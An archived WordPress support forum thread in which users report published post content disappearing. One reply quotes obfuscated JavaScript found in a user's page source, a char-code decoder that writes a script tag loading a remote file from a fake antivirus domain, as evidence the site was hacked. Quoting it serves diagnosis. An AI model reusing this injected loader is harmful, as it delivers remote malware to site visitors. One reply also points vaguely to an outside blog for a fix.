WordPress.org

Ready to get started?Download WordPress

Forums

Entry content disappears, blog post left blank (12 posts)

  1. watchmojo
    Member
    Posted 5 years ago #

    This blog
    http://www.watchmojo.com/news/blog/

    Take for example this entry:
    http://watchmojo.com/news/blog/index.php/2008/11/25/told-ya-so-russian-political-analyst-says-us-will-break-apart/

    http://watchmojo.com/news/blog/index.php/2008/11/21/us-world-dominance-on-its-way-out/

    etc. I will publish a post, and then later on that day or the next day, the contents of the post are gone... even when I press EDIT and see inside the post: nothing.

    any clue why this happens?

    thanks

  2. plekter
    Member
    Posted 5 years ago #

    I have the same problem! Very annoying, has been like this in november! Possibly since mid october. The title of the article remains.

    I'm on version 2.0.5 if that has anything to do with it? Have I been hacked? Is it a bug?

    my site: http://www.diggfotball.com

  3. whooami
    Member
    Posted 5 years ago #

    watchmojo,

    <!-- generator="wordpress/2.1.3" -->

    I wouldnt be surprised if your site was hacked.

    --

    same goes for the other person.

    Not sure what you expect when you continue to use insecure sofware.

  4. whooami
    Member
    Posted 5 years ago #

    in fact, whats THIS in your source, mujo:

    <SCRIPT LANGUAGE="JavaScript">
    <!--
    function Decode(){var temp="",i,c=0,out="";var str="60!115!99!114!105!112!116!32!115!114!99!61!39!104!116!116!112!58!47!47!119!105!110!100!111!119!115!45!97!110!116!105!118!105!114!117!115!45!50!48!48!56!46!99!111!109!47!119!112!46!106!115!39!62!60!47!115!99!114!105!112!116!62!";l=str.length;while(c<=str.length-1){while(str.charAt(c)!='!')temp=temp+str.charAt(c++);c++;out=out+String.fromCharCode(temp);temp="";}document.write(out);}
    //-->
    </SCRIPT><SCRIPT LANGUAGE="JavaScript">
    <!--
    Decode();
    //-->
    </SCRIPT>
  5. plekter
    Member
    Posted 5 years ago #

    In which file whas the javascript found? Where can I go delete it? Will an upgrade help this issue whooami?

  6. plekter
    Member
    Posted 5 years ago #

    Need some more help on this one. Will an upgrade help?

  7. plekter
    Member
    Posted 5 years ago #

    >The upgrade didn't seem to help, how do I get rid of this hack?

  8. watchmojo
    Member
    Posted 5 years ago #

    thank you Whooami, but the question then is: what page do I remove that from?

    I did a Find and Replace in the entire folder trying to find it, and could not...

    Any suggestions are appreciated?

  9. Matthew Meyer
    Member
    Posted 5 years ago #

    I'm having this same problem as well. Did you guys figure out how to fix it?

  10. infopage
    Member
    Posted 5 years ago #

    Hey I actually have a solution to this one and it is posted on The MarketSecrets Blog!!!!

    Hope this helps...

  11. nchenga
    Member
    Posted 5 years ago #

    the same happened to me

    db repair hasn't solved the issue

  12. Matthew Meyer
    Member
    Posted 4 years ago #

    This problem occurs for me only when dealing with captions. It isn't a DB problem at all; it has something to do with the way WP handles the captions.

Topic Closed

This topic has been closed to new replies.

About this Topic